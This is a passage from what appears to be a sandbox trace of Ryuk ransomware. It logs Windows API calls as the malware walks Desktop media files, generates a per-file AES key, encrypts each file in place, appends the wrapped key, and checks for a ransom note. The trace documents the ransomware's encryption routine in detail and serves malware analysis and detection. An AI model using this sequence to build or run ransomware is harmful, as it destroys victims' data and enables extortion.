lpOverlapped=0x0) returned 1 [0152.230] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.230] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0152.230] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.231] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.231] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x127cd, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x127cd, lpOverlapped=0x0) returned 1 [0152.232] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0152.232] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x127cd, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x127d0) returned 1 [0152.233] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.233] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x127d0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x127d0, lpOverlapped=0x0) returned 1 [0152.233] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0152.233] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0152.233] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0152.233] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0152.233] CloseHandle (hObject=0x18c) returned 1 [0152.251] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.274] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.274] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.274] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0152.274] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0152.274] SetLastError (dwErrCode=0x0) [0152.274] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0152.274] GetLastError () returned 0xb7 [0152.274] CloseHandle (hObject=0x188) returned 1 [0152.274] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0152.274] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.274] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lHA dYL.m4a", dwFileAttributes=0x80) returned 1 [0152.275] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lHA dYL.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lha dyl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0152.275] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=13685) returned 1 [0152.275] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=13685) returned 1 [0152.275] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x3453, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.275] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0152.276] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.276] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0152.276] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.276] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.276] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x3575, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x3575, lpOverlapped=0x0) returned 1 [0152.276] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0152.276] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x3575, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x3580) returned 1 [0152.277] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.277] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3580, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x3580, lpOverlapped=0x0) returned 1 [0152.277] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0152.277] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.277] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.277] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0152.277] CloseHandle (hObject=0x188) returned 1 [0152.295] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.299] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.299] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.299] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0152.299] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.299] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MaDceDOt4_yLbvmRMBZ.mp3", dwFileAttributes=0x80) returned 1 [0152.299] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\MaDceDOt4_yLbvmRMBZ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\madcedot4_ylbvmrmbz.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0152.300] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=64562) returned 1 [0152.300] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=64562) returned 1 [0152.300] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfb10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.300] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0152.300] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.300] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0152.300] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.301] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.301] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0xfc32, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0xfc32, lpOverlapped=0x0) returned 1 [0152.302] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0152.302] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xfc32, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xfc40) returned 1 [0152.303] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.303] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xfc40, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0xfc40, lpOverlapped=0x0) returned 1 [0152.303] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0152.303] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.303] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.303] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0152.303] CloseHandle (hObject=0x188) returned 1 [0152.343] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.347] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.347] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.348] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0152.348] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.348] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mPYpEo8GYze8FPk1j.wav", dwFileAttributes=0x80) returned 1 [0152.348] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mPYpEo8GYze8FPk1j.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mpypeo8gyze8fpk1j.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0152.349] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=50525) returned 1 [0152.349] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=50525) returned 1 [0152.349] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xc43b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.349] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0152.349] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.349] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0152.349] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.350] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.350] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0xc55d, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0xc55d, lpOverlapped=0x0) returned 1 [0152.350] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0152.350] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xc55d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xc560) returned 1 [0152.351] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.351] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xc560, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0xc560, lpOverlapped=0x0) returned 1 [0152.351] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0152.351] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.351] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.351] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0152.351] CloseHandle (hObject=0x188) returned 1 [0152.367] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.371] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.371] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.371] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0152.371] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.371] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oa_eNlMPY.flv", dwFileAttributes=0x80) returned 1 [0152.371] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oa_eNlMPY.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oa_enlmpy.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0152.372] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=94254) returned 1 [0152.372] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=94254) returned 1 [0152.372] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x16f0c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.372] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0152.373] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.373] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0152.373] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.373] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.373] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1702e, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x1702e, lpOverlapped=0x0) returned 1 [0152.374] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0152.374] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x1702e, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x17030) returned 1 [0152.375] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.375] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x17030, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x17030, lpOverlapped=0x0) returned 1 [0152.375] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0152.375] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.375] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.375] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0152.375] CloseHandle (hObject=0x188) returned 1 [0152.390] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.394] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.394] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.394] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0152.394] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.395] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oLUQhdKEvL.mp4", dwFileAttributes=0x80) returned 1 [0152.395] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oLUQhdKEvL.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oluqhdkevl.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0152.395] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=98056) returned 1 [0152.395] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=98056) returned 1 [0152.395] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x17de6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.395] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0152.396] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.396] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0152.396] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.396] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.396] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x17f08, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x17f08, lpOverlapped=0x0) returned 1 [0152.398] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0152.398] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x17f08, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x17f10) returned 1 [0152.398] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.398] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x17f10, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x17f10, lpOverlapped=0x0) returned 1 [0152.399] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0152.399] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.399] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0152.399] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0152.399] CloseHandle (hObject=0x188) returned 1 [0152.413] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.417] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.417] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.418] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0152.418] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.418] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OmMryh0P8Nm-A7w9r.jpg", 